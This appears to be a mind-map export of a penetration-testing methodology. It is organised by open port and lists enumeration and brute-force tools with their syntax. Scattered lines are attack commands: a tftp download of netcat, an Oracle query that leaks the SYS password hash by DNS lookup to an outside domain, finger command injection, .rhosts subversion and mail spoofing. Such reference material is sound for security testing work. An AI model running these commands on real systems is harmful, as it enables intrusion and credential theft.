Penetration Testing Framework 0.58

Get Started. It's Free
or sign up with your email address
Penetration Testing Framework 0.58 by Mind Map: Penetration Testing Framework 0.58

1. Manual Testing

1.1. Create Batch File (cmd.bat)

1.1.1. 1

1.1.1.1. cmd.exe

1.1.2. 2

1.1.2.1. echo off

1.1.2.2. command

1.1.2.3. echo on

1.2. Host Scripting File (cmd.vbs)

1.2.1. Option Explicit

1.2.2. Dim objShell

1.2.3. objShell.Run "%comspec% /k"

1.2.4. WScript.Quit

1.2.5. alternative functionality

1.2.5.1. objShell.Run "%comspec% /k c: & dir"

1.2.5.2. objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"

1.2.5.3. objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)

1.3. iKat

1.3.1. Integrated Kiosk Attack Tool

1.3.1.1. Reconnaissance

1.3.1.2. FileSystem Links

1.3.1.3. Common Dialogs

1.3.1.4. Application Handlers

1.3.1.5. Browser Plugins

1.3.1.6. iKAT Tools

1.4. AT Command - priviledge escalation

1.4.1. AT HH:MM /interactive "cmd.exe"

1.4.2. AT HH:MM /interactive %comspec% /k

1.4.3. Untitled

1.5. Keyboard Shortcuts/ Hotkeys

1.5.1. Ctrl + h – View History

1.5.2. Ctrl + n – New Browser

1.5.3. Shift + Left Click – New Browser

1.5.4. Ctrl + o – Internet Address (browse feature)

1.5.5. Ctrl + p – Print (to file)

1.5.6. Right Click (Shift + F10)

1.5.6.1. Save Image As

1.5.6.2. View Source

1.5.7. F1 – Jump to URL

1.5.8. SHIFT+F1: Local Task List

1.5.9. SHIFT+F2: Toggle Title Bar

1.5.10. SHIFT+F3: Close Remote Application

1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

1.5.12. CTRL+F2: Remote Task List

1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

1.5.14. ALT+F2: Cycle through programs

1.5.15. ALT+PLUS: Alt+TAB

1.5.16. ALT+MINUS: ALT+SHIFT+TAB

2. inurl:Citrix/AccessPlatform/auth/login.aspx

3. X11 port 6000^ open

3.1. X11 Enumeration

3.1.1. List open windows

3.1.2. Authentication Method

3.1.2.1. Xauth

3.1.2.2. Xhost

3.2. X11 Exploitation

3.2.1. xwd

3.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

3.2.2. Keystrokes

3.2.2.1. Received

3.2.2.2. Transmitted

3.2.3. Screenshots

3.2.4. xhost +

3.3. Examine Configuration Files

3.3.1. /etc/Xn.hosts

3.3.2. /usr/lib/X11/xdm

3.3.2.1. Untitled

3.3.3. /usr/lib/X11/xdm/xsession

3.3.4. /usr/lib/X11/xdm/xsession-remote

3.3.5. /usr/lib/X11/xdm/xsession.0

3.3.6. /usr/lib/X11/xdm/xdm-config

3.3.6.1. DisplayManager*authorize:on

4. pwdump [-h][-o][-u][-p] machineName

5. Nabil contributed the AS/400 section.

6. Client Side Security

7. Back end files

7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

8. Set objShell = CreateObject("WScript.Shell")

9. Check visible areas for sensitive information.

10. InitialProgram=c:\windows\system32\cmd.exe

11. Pre-Inspection Visit - template

12. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

12.1. Default Port Lists

12.1.1. Windows

12.1.2. *nix

12.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

12.2.1. General Enumeration Tools

12.2.1.1. nmap

12.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml

12.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

12.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

12.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

12.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

12.2.1.2. netcat

12.2.1.2.1. nc -v -n IP_Address port

12.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

12.2.1.3. amap

12.2.1.3.1. amap -bqv 192.168.1.1 80

12.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

12.2.1.4. xprobe2

12.2.1.4.1. xprobe2 192.168.1.1

12.2.1.5. sinfp

12.2.1.5.1. ./sinfp.pl -i -p

12.2.1.6. nbtscan

12.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

12.2.1.7. hping

12.2.1.7.1. hping ip_address

12.2.1.8. scanrand

12.2.1.8.1. scanrand ip_address:all

12.2.1.9. unicornscan

12.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

12.2.1.10. netenum

12.2.1.10.1. netenum network/netmask timeout

12.2.1.11. fping

12.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

12.2.2. Firewall Specific Tools

12.2.2.1. firewalk

12.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

12.2.2.2. ftester

12.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

12.2.3. Default Passwords (Examine list)

12.2.3.1. Passwords A

12.2.3.2. Passwords B

12.2.3.3. Passwords C

12.2.3.4. Passwords D

12.2.3.5. Passwords E

12.2.3.6. Passwords F

12.2.3.7. Passwords G

12.2.3.8. Passwords H

12.2.3.9. Passwords I

12.2.3.10. Passwords J

12.2.3.11. Passwords K

12.2.3.12. Passwords L

12.2.3.13. Passwords M

12.2.3.14. Passwords N

12.2.3.15. Passwords O

12.2.3.16. Passwords P

12.2.3.17. Passwords R

12.2.3.18. Passwords S

12.2.3.19. Passwords T

12.2.3.20. Passwords U

12.2.3.21. Passwords V

12.2.3.22. Passwords W

12.2.3.23. Passwords X

12.2.3.24. Passwords Y

12.2.3.25. Passwords Z

12.2.3.26. Passwords (Numeric)

12.3. Active Hosts

12.3.1. Open TCP Ports

12.3.2. Closed TCP Ports

12.3.3. Open UDP Ports

12.3.4. Closed UDP Ports

12.3.5. Service Probing

12.3.5.1. SMTP Mail Bouncing

12.3.5.2. Banner Grabbing

12.3.5.2.1. Other

12.3.5.2.2. HTTP

12.3.5.2.3. HTTPS

12.3.5.2.4. SMTP

12.3.5.2.5. POP3

12.3.5.2.6. FTP

12.3.6. ICMP Responses

12.3.6.1. Type 3 (Port Unreachable)

12.3.6.2. Type 8 (Echo Request)

12.3.6.3. Type 13 (Timestamp Request)

12.3.6.4. Type 15 (Information Request)

12.3.6.5. Type 17 (Subnet Address Mask Request)

12.3.6.6. Responses from broadcast address

12.3.7. Source Port Scans

12.3.7.1. TCP/UDP 53 (DNS)

12.3.7.2. TCP 20 (FTP Data)

12.3.7.3. TCP 80 (HTTP)

12.3.7.4. TCP/UDP 88 (Kerberos)

12.3.8. Firewall Assessment

12.3.8.1. Firewalk

12.3.8.2. TCP/UDP/ICMP responses

12.3.9. OS Fingerprint

13. Enumeration

13.1. Daytime port 13 open

13.1.1. nmap nse script

13.1.1.1. daytime

13.2. FTP port 21 open

13.2.1. Fingerprint server

13.2.1.1. telnet ip_address 21 (Banner grab)

13.2.1.2. Run command ftp ip_address

13.2.1.3. [email protected]

13.2.1.4. Check for anonymous access

13.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

13.2.2. Password guessing

13.2.2.1. Hydra brute force

13.2.2.2. medusa

13.2.2.3. Brutus

13.2.3. Examine configuration files

13.2.3.1. ftpusers

13.2.3.2. ftp.conf

13.2.3.3. proftpd.conf

13.2.4. MiTM

13.2.4.1. pasvagg.pl

13.3. SSH port 22 open

13.3.1. Fingerprint server

13.3.1.1. telnet ip_address 22 (banner grab)

13.3.1.2. scanssh

13.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

13.3.2. Password guessing

13.3.2.1. ssh root@ip_address

13.3.2.2. guess-who

13.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

13.3.2.3. Hydra brute force

13.3.2.4. brutessh

13.3.2.5. Ruby SSH Bruteforcer

13.3.3. Examine configuration files

13.3.3.1. ssh_config

13.3.3.2. sshd_config

13.3.3.3. authorized_keys

13.3.3.4. ssh_known_hosts

13.3.3.5. .shosts

13.3.4. SSH Client programs

13.3.4.1. tunnelier

13.3.4.2. winsshd

13.3.4.3. putty

13.3.4.4. winscp

13.4. Telnet port 23 open

13.4.1. Fingerprint server

13.4.1.1. telnet ip_address

13.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster

13.4.1.2. telnetfp

13.4.2. Password Attack

13.4.2.1. Untitled

13.4.2.2. Brutus

13.4.2.3. Hydra brute force

13.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

13.4.3. Examine configuration files

13.4.3.1. /etc/xinetd.d/telnet

13.4.3.2. /etc/xinetd.d/stelnet

13.5. Sendmail Port 25 open

13.5.1. Fingerprint server

13.5.1.1. telnet ip_address 25 (banner grab)

13.5.2. Mail Server Testing

13.5.2.1. Enumerate users

13.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

13.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

13.5.2.2. Mail Spoof Test

13.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT

13.5.2.3. /etc/inetd.conf

13.5.2.4. Mail Relay Test

13.5.2.4.1. Untitled

13.5.3. Examine Configuration Files

13.5.3.1. sendmail.cf

13.5.3.2. submit.cf

13.6. DNS port 53 open

13.6.1. Fingerprint server/ service

13.6.1.1. host

13.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.

13.6.1.2. nslookup

13.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

13.6.1.3. dig

13.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

13.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

13.6.2. DNS Enumeration

13.6.2.1. Bile Suite

13.6.2.1.1. perl BiLE.pl [website] [project_name]

13.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

13.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

13.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

13.6.2.1.5. perl exp-tld.pl [input file] [output file]

13.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

13.6.2.1.7. perl jarf-rev [subnetblock] [nameserver]

13.6.2.2. txdns

13.6.2.2.1. txdns -rt -t domain_name

13.6.2.2.2. txdns -x 50 -bb domain_name

13.6.2.3. nmap nse scripts

13.6.2.3.1. dns-random-srcport

13.6.2.3.2. dns-random-txid

13.6.2.3.3. dns-recursion

13.6.2.3.4. dns-zone-transfer

13.6.3. Examine Configuration Files

13.6.3.1. host.conf

13.6.3.2. resolv.conf

13.6.3.3. named.conf

13.7. perl qtrace.pl [ip_address_file] [output_file]

13.8. TFTP port 69 open

13.8.1. TFTP Enumeration

13.8.1.1. tftp ip_address PUT local_file

13.8.1.2. tftp ip_address GET conf.txt (or other files)

13.8.1.3. Solarwinds TFTP server

13.8.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)

13.8.2. TFTP Bruteforcing

13.8.2.1. TFTP bruteforcer

13.8.2.2. Cisco-Torch

13.9. Finger Port 79 open

13.9.1. User enumeration

13.9.1.1. finger 'a b c d e f g h' @example.com

13.9.1.2. finger [email protected]

13.9.1.3. finger [email protected]

13.9.1.4. finger [email protected]

13.9.1.5. finger [email protected]

13.9.1.6. finger **@example.com

13.9.1.7. finger [email protected]

13.9.1.8. finger @example.com

13.9.1.9. nmap nse script

13.9.1.9.1. finger

13.9.2. Command execution

13.9.2.1. finger "|/bin/[email protected]"

13.9.2.2. finger "|/bin/ls -a /@example.com"

13.9.3. Finger Bounce

13.9.3.1. finger user@host@victim

13.9.3.2. finger @internal@external

13.10. Web Ports 80,8080 etc. open

13.10.1. Fingerprint server

13.10.1.1. Telnet ip_address port

13.10.1.2. Firefox plugins

13.10.1.2.1. All

13.10.1.2.2. Specific

13.10.2. Crawl website

13.10.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source

13.10.2.2. httprint

13.10.2.3. Metagoofil

13.10.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

13.10.3. Web Directory enumeration

13.10.3.1. Nikto

13.10.3.1.1. nikto [-h target] [options]

13.10.3.2. DirBuster

13.10.3.3. Wikto

13.10.3.4. Goolag Scanner

13.10.4. Vulnerability Assessment

13.10.4.1. Manual Tests

13.10.4.1.1. Default Passwords

13.10.4.1.2. Install Backdoors

13.10.4.1.3. Method Testing

13.10.4.1.4. Upload Files

13.10.4.1.5. View Page Source

13.10.4.1.6. Input Validation Checks

13.10.4.1.7. Automated table and column iteration

13.10.4.2. Vulnerability Scanners

13.10.4.2.1. Acunetix

13.10.4.2.2. Grendelscan

13.10.4.2.3. NStealth

13.10.4.2.4. Obiwan III

13.10.4.2.5. w3af

13.10.4.3. Specific Applications/ Server Tools

13.10.4.3.1. Domino

13.10.4.3.2. Joomla

13.10.4.3.3. aspaudit.pl

13.10.4.3.4. Vbulletin

13.10.4.3.5. ZyXel

13.10.5. Proxy Testing

13.10.5.1. Burpsuite

13.10.5.2. Crowbar

13.10.5.3. Interceptor

13.10.5.4. Paros

13.10.5.5. Requester Raw

13.10.5.6. Suru

13.10.5.7. WebScarab

13.10.6. Examine configuration files

13.10.6.1. Generic

13.10.6.1.1. Examine httpd.conf/ windows config files

13.10.6.2. JBoss

13.10.6.2.1. JMX Console http://<IP>:8080/jmxconcole/

13.10.6.3. Joomla

13.10.6.3.1. configuration.php

13.10.6.3.2. diagnostics.php

13.10.6.3.3. joomla.inc.php

13.10.6.3.4. config.inc.php

13.10.6.4. Mambo

13.10.6.4.1. configuration.php

13.10.6.4.2. config.inc.php

13.10.6.5. Wordpress

13.10.6.5.1. setup-config.php

13.10.6.5.2. wp-config.php

13.10.6.6. ZyXel

13.10.6.6.1. /WAN.html (contains PPPoE ISP password)

13.10.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

13.10.6.6.3. /rpDyDNS.html (contains DDNS credentials)

13.10.6.6.4. /Firewall_DefPolicy.html (Firewall)

13.10.6.6.5. /CF_Keyword.html (Content Filter)

13.10.6.6.6. /RemMagWWW.html (Remote MGMT)

13.10.6.6.7. /rpSysAdmin.html (System)

13.10.6.6.8. /LAN_IP.html (LAN)

13.10.6.6.9. /NAT_General.html (NAT)

13.10.6.6.10. /ViewLog.html (Logs)

13.10.6.6.11. /rpFWUpload.html (Tools)

13.10.6.6.12. /DiagGeneral.html (Diagnostic)

13.10.6.6.13. /RemMagSNMP.html (SNMP Passwords)

13.10.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

13.10.6.6.15. Config Backups

13.10.7. Examine web server logs

13.10.7.1. c:\winnt\system32\Logfiles\W3SVC1

13.10.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq

13.10.8. References

13.10.8.1. White Papers

13.10.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

13.10.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

13.10.8.1.3. Blind Security Testing - An Evolutionary Approach

13.10.8.1.4. Command Injection in XML Signatures and Encryption

13.10.8.1.5. Input Validation Cheat Sheet

13.10.8.1.6. SQL Injection Cheat Sheet

13.10.8.2. Books

13.10.8.2.1. Hacking Exposed Web 2.0

13.10.8.2.2. Hacking Exposed Web Applications

13.10.8.2.3. The Web Application Hacker's Handbook

13.10.9. Exploit Frameworks

13.10.9.1. Brute-force Tools

13.10.9.1.1. Acunetix

13.10.9.2. Metasploit

13.10.9.3. w3af

13.11. Portmapper port 111 open

13.11.1. rpcdump.py

13.11.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

13.11.2. rpcinfo

13.11.2.1. rpcinfo [options] IP_Address

13.12. NTP Port 123 open

13.12.1. NTP Enumeration

13.12.1.1. ntpdc -c monlist IP_ADDRESS

13.12.1.2. ntpdc -c sysinfo IP_ADDRESS

13.12.1.3. ntpq

13.12.1.3.1. host

13.12.1.3.2. hostname

13.12.1.3.3. ntpversion

13.12.1.3.4. readlist

13.12.1.3.5. version

13.12.2. Examine configuration files

13.12.2.1. ntp.conf

13.12.3. nmap nse script

13.12.3.1. ntp-info

13.13. NetBIOS Ports 135-139,445 open

13.13.1. NetBIOS enumeration

13.13.1.1. Enum

13.13.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

13.13.1.2. Null Session

13.13.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

13.13.1.3. Smbclient

13.13.1.3.1. smbclient -L //server/share password options

13.13.1.4. Superscan

13.13.1.4.1. Enumeration tab.

13.13.1.5. user2sid/sid2user

13.13.1.6. Winfo

13.13.2. NetBIOS brute force

13.13.2.1. Hydra

13.13.2.2. Brutus

13.13.2.3. Cain & Abel

13.13.2.4. getacct

13.13.2.5. NAT (NetBIOS Auditing Tool)

13.13.3. Examine Configuration Files

13.13.3.1. Smb.conf

13.13.3.2. lmhosts

13.14. SNMP port 161 open

13.14.1. Default Community Strings

13.14.1.1. public

13.14.1.2. private

13.14.1.3. cisco

13.14.1.3.1. cable-docsis

13.14.1.3.2. ILMI

13.14.2. MIB enumeration

13.14.2.1. Windows NT

13.14.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

13.14.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

13.14.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

13.14.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

13.14.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

13.14.2.2. Solarwinds MIB walk

13.14.2.3. Getif

13.14.2.4. snmpwalk

13.14.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

13.14.2.5. Snscan

13.14.2.6. Applications

13.14.2.6.1. ZyXel

13.14.2.7. nmap nse script

13.14.2.7.1. snmp-sysdescr

13.14.3. SNMP Bruteforce

13.14.3.1. onesixtyone

13.14.3.1.1. onesixytone -c SNMP.wordlist <IP>

13.14.3.2. cat

13.14.3.2.1. ./cat -h <IP> -w SNMP.wordlist

13.14.3.3. Solarwinds SNMP Brute Force

13.14.3.4. ADMsnmp

13.14.3.5. nmap nse script

13.14.3.5.1. snmp-brute

13.14.4. Examine SNMP Configuration files

13.14.4.1. snmp.conf

13.14.4.2. snmpd.conf

13.14.4.3. snmp-config.xml

13.15. LDAP Port 389 Open

13.15.1. ldap enumeration

13.15.1.1. ldapminer

13.15.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

13.15.1.2. luma

13.15.1.2.1. Gui based tool

13.15.1.3. ldp

13.15.1.3.1. Gui based tool

13.15.1.4. openldap

13.15.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

13.15.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

13.15.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

13.15.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

13.15.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

13.15.2. ldap brute force

13.15.2.1. bf_ldap

13.15.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)

13.15.2.2. K0ldS

13.15.2.3. LDAP_Brute.pl

13.15.3. Examine Configuration Files

13.15.3.1. General

13.15.3.1.1. containers.ldif

13.15.3.1.2. ldap.cfg

13.15.3.1.3. ldap.conf

13.15.3.1.4. ldap.xml

13.15.3.1.5. ldap-config.xml

13.15.3.1.6. ldap-realm.xml

13.15.3.1.7. slapd.conf

13.15.3.2. IBM SecureWay V3 server

13.15.3.2.1. V3.sas.oc

13.15.3.3. Microsoft Active Directory server

13.15.3.3.1. msadClassesAttrs.ldif

13.15.3.4. Netscape Directory Server 4

13.15.3.4.1. nsslapd.sas_at.conf

13.15.3.4.2. nsslapd.sas_oc.conf

13.15.3.5. OpenLDAP directory server

13.15.3.5.1. slapd.sas_at.conf

13.15.3.5.2. slapd.sas_oc.conf

13.15.3.6. Sun ONE Directory Server 5.1

13.15.3.6.1. 75sas.ldif

13.16. PPTP/L2TP/VPN port 500/1723 open

13.16.1. Enumeration

13.16.1.1. ike-scan

13.16.1.2. ike-probe

13.16.2. Brute-Force

13.16.2.1. ike-crack

13.16.3. Reference Material

13.16.3.1. PSK cracking paper

13.16.3.2. SecurityFocus Infocus

13.16.3.3. Scanning a VPN Implementation

13.17. Modbus port 502 open

13.17.1. modscan

13.18. rlogin port 513 open

13.18.1. Rlogin Enumeration

13.18.1.1. Find the files

13.18.1.1.1. find / -name .rhosts

13.18.1.1.2. locate .rhosts

13.18.1.2. Examine Files

13.18.1.2.1. cat .rhosts

13.18.1.3. Manual Login

13.18.1.3.1. rlogin hostname -l username

13.18.1.3.2. rlogin <IP>

13.18.1.4. Subvert the files

13.18.1.4.1. echo ++ > .rhosts

13.18.2. Rlogin Brute force

13.18.2.1. Hydra

13.19. rsh port 514 open

13.19.1. Rsh Enumeration

13.19.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

13.19.2. Rsh Brute Force

13.19.2.1. rsh-grind

13.19.2.2. Hydra

13.19.2.3. medusa

13.20. SQL Server Port 1433 1434 open

13.20.1. SQL Enumeration

13.20.1.1. piggy

13.20.1.2. SQLPing

13.20.1.2.1. sqlping ip_address/hostname

13.20.1.3. SQLPing2

13.20.1.4. SQLPing3

13.20.1.5. SQLpoke

13.20.1.6. SQL Recon

13.20.1.7. SQLver

13.20.2. SQL Brute Force

13.20.2.1. SQLPAT

13.20.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

13.20.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

13.20.2.2. SQL Dict

13.20.2.3. SQLAT

13.20.2.4. Hydra

13.20.2.5. SQLlhf

13.20.2.6. ForceSQL

13.21. Citrix port 1494 open

13.21.1. Citrix Enumeration

13.21.1.1. Default Domain

13.21.1.2. Published Applications

13.21.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

13.21.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

13.21.2. Citrix Brute Force

13.21.2.1. bforce.js

13.21.2.2. connect.js

13.21.2.3. Citrix Brute-forcer

13.21.2.4. Reference Material

13.21.2.4.1. Hacking Citrix - the legitimate backdoor

13.21.2.4.2. Hacking Citrix - the forceful way

13.22. Oracle Port 1521 Open

13.22.1. Oracle Enumeration

13.22.1.1. oracsec

13.22.1.2. Repscan

13.22.1.3. Sidguess

13.22.1.4. Scuba

13.22.1.5. DNS/HTTP Enumeration

13.22.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL

13.22.1.5.2. Untitled

13.22.1.6. WinSID

13.22.1.7. Oracle default password list

13.22.1.8. TNSVer

13.22.1.8.1. tnsver host [port]

13.22.1.9. TCP Scan

13.22.1.10. Oracle TNSLSNR

13.22.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

13.22.1.11. TNSCmd

13.22.1.11.1. perl tnscmd.pl -h ip_address

13.22.1.11.2. perl tnscmd.pl version -h ip_address

13.22.1.11.3. perl tnscmd.pl status -h ip_address

13.22.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

13.22.1.12. LSNrCheck

13.22.1.13. Oracle Security Check (needs credentials)

13.22.1.14. OAT

13.22.1.14.1. sh opwg.sh -s ip_address

13.22.1.14.2. opwg.bat -s ip_address

13.22.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

13.22.1.15. OScanner

13.22.1.15.1. sh oscanner.sh -s ip_address

13.22.1.15.2. oscanner.exe -s ip_address

13.22.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

13.22.1.15.4. reportviewer.exe oscanner_saved_file.xml

13.22.1.16. NGS Squirrel for Oracle

13.22.1.17. Service Register

13.22.1.17.1. Service-register.exe ip_address

13.22.1.18. PLSQL Scanner 2008

13.22.2. Oracle Brute Force

13.22.2.1. OAK

13.22.2.1.1. ora-getsid hostname port sid_dictionary_list

13.22.2.1.2. ora-auth-alter-session host port sid username password sql

13.22.2.1.3. ora-brutesid host port start

13.22.2.1.4. ora-pwdbrute host port sid username password-file

13.22.2.1.5. ora-userenum host port sid userlistfile

13.22.2.1.6. ora-ver -e (-f -l -a) host port

13.22.2.2. breakable (Targets Application Server Port)

13.22.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose

13.22.2.3. SQLInjector (Targets Application Server Port)

13.22.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

13.22.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

13.22.2.4. Check Password

13.22.2.5. orabf

13.22.2.5.1. orabf [hash]:[username] [options]

13.22.2.6. thc-orakel

13.22.2.6.1. Cracker

13.22.2.6.2. Client

13.22.2.6.3. Crypto

13.22.2.7. DBVisualisor

13.22.2.7.1. Sql scripts from pentest.co.uk

13.22.2.7.2. Manual sql input of previously reported vulnerabilties

13.22.3. Oracle Reference Material

13.22.3.1. Understanding SQL Injection

